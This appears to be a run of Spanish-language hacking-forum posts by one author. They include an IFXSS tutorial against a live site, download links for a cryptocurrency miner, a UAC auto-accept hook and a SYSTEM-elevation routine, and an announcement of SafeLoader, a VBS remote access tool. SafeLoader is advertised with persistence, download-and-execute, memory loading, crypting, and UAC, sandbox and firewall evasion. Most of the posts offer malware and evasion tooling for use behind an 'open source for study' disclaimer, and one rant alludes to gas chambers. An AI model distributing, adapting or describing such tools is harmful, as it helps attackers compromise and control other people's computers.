Sí, el cartelito de la UAC(Control de Cuentas de Usuario), que tienes que confirmar cuando un programa quiere añadirse al StartUP o cosas por el estilo. 

//Regards.

Este tutorial tiene ya su tiempo, y hace unos dias lo recupere, asi que aqui lo comparto. 

Antes de nada, aclarar que la vulnerabilidad que voy a explotar en este tutorial, ha sido reportada, y espero que corregida, ya solo dar las gracias a JKS por descubrir y darle nombre a esta Vulnerabilidad, y a Sanko, por ayudarme en algunas cosillas.

- ¿Qué es un IFXSS?
Técnicamente, un IFXSS (Image Filename Cross Site Scripting), oh como dice su nombre, es una vulnerabilidad que se debe al mal filtrado del nombre de una imagen, permitiendo la ejecución de código en el servidor.

- ¿Qué daño puede causar un IFXSS?
Basicamente un IFXSS no causa daño, a no ser de que sea Stored, entonces todo el mundo que acceda a la pagina visualizara el IFXSS.

- ¿Donde encontrar un IFXSS?
Puedes encontrar un IFXSS en cualquier Uploader, que muestre el nombre del archivo y que con suerte no este bien filtrado.

Muy bien, explicado esto, pasamos a explotar un IFXSS en un caso real.
La pagina afectada es , la vulnerabilidad ya ha sido reportada, es cuestión de tiempo que la corrijan.

Bien, al acceder a la web, podemos ver un uploader, lo primero sera subir una foto, en este caso se llama ''Avatar.png'', para ver que tenemos por hay...


Observamos que el nombre de la imagen, no se ve por ninguna parte, pero aún nos queda un intento.


Como puedes ver, la pagina muestra Files with the extension .txt are not allowed. ¿Qué? ¿Que no muestra el nombre del archivo? Claro, pero nos muestra la extensión jaja.

Bien, ya que vemos que cuando hay error, la pagina guarda la extension del archivo, probemos a insertar el siguiente codigo como extension:


Y hay esta, nuestra querida alerta, que aparece al dar click en la web. 

Bueno, aquí concluye el Tutorial, espero que les sea útil, y que comenten si tienen alguna duda.

//Regards.

Bueno, sin mas, en su tiempo ese miner era bueno, ademas esta sacado de la VIP de Romanian Security Team.

Descarga: https://mega.co.nz/#!91h00aDb!WWlUzQm2Bao79k058C8RL1oBmcYnb66hKVtbvZ1aLwo

//Regards.

Bueno, esta función hace uso de PsExec para elevar cualquier proceso a SYSTEM, necesita privilegios de Administrador. 

Link: http://www.sendspace.com/file/s8phij

PD: Subi el archivo por que en PasteBin excedia el limite y en el foro tambien. 

//Regards.

Una cosita que tenia en el Baul, hace un Hook al Cartelito de la UAC y lo Acepta Automaticamente, todos los creditos para su creador, yo solo lo adapte como función para su uso. 

http://pastebin.com/rjWgMXfP

PD: Funcional en 32 y 64 Bits, Soporte UNICODE.

//Regards.

Bueno, no tiene mucho la verdad, mi versión de RotN. 

Func RotN($Text, $Long, $Encrypt)
    Local $sResult = ""
 
    If $Encrypt = True Then
        For $i = 1 To StringLen($Text)
            $sResult = Chr(Asc(StringMid($Text, $i, 1)) + $Long) & $sResult
        Next
    Else
        For $i = 1 To StringLen($Text)
            $sResult = Chr(Asc(StringMid($Text, $i, 1)) - $Long) & $sResult
        Next
    EndIf
    Return $sResult
EndFunc

PD: La variable $Encrypt la ponen en True si quieren que Encripte y en False si quieren que Desencripte.

//Regards.

Abusones Adolescentes = Ladrones, Asesinos, Estafadores, Maltratadores y Violadores Adultos.

No voy a decír que por mí todos a la Camara de Gas, pero si le impondria una multa de unos 3.000€ a los Padres, como cuando tu perro muerde a alguien, y a ellos unos cursos de re-educación.

//Regards.

Buenas, perdona por esa función, siempre la uso para testear la conectividad cuando estoy desarrollando y se me olvido eliminarla del panel. xD

Basicamente SafeLoader es una herramienta de Administración Remota con varias funciones como Download & Execute o Update, al ser Open Source tu mismo lo puedes Editar, Postear, Mejorar, Etc...

//Regards.

Por mi Perfecto, aun le queda mucho por mejorar, no añadire mas funcionalidades en sí, solo los Spreads y Poliformismo, tambien mejorare las funciones ya añadidas. 

//Regards.

Lo primero de todo, aclarar que SafeLoader es una herramienta de Administración Remota OPEN SOURCE creada para su analisis y estudio, no me hago responsable del mal uso que puedan darle.

Image:
http://i.imgur.com/KOkUvIB.png

Scan:
http://www.indetectables.net/scanner.php?report=7g4z9glu24


Features:
-Coded in VBS (Work in All Windows)
-Anti-Track Panel
-Easy to Install
-All Traffic is Encrypted
-StartUP with Startup Folders
-StartUP with Regedit
-Startup with Windows Tasks
-GeoLocation with GeoIP
-VBS Downloader and Load in Memory
-Stable Update
-Full Uninstall
-Small Size (8Kb)
-Easy Cryptable
-Fuck UAC, SandBox and Firewall[/center]

Credits:
-MadAntrax (Puse dos de tus StartUP's)
-Strup (Por traducir el cifrado a PHP) <3
-Houdini (Me base en el H-Worm, aunque da Pena y Dolor leerlo.)

Download:
http://www.sendspace.com/file/e4kahw

PD: Eso es todo, recuerden que es una Versión Beta, y aun le queda mucho por mejorar, asi que comuniquen cualquier error.

PD2: Proxima Versión será Polimorfica.  :drinking:

//Regards.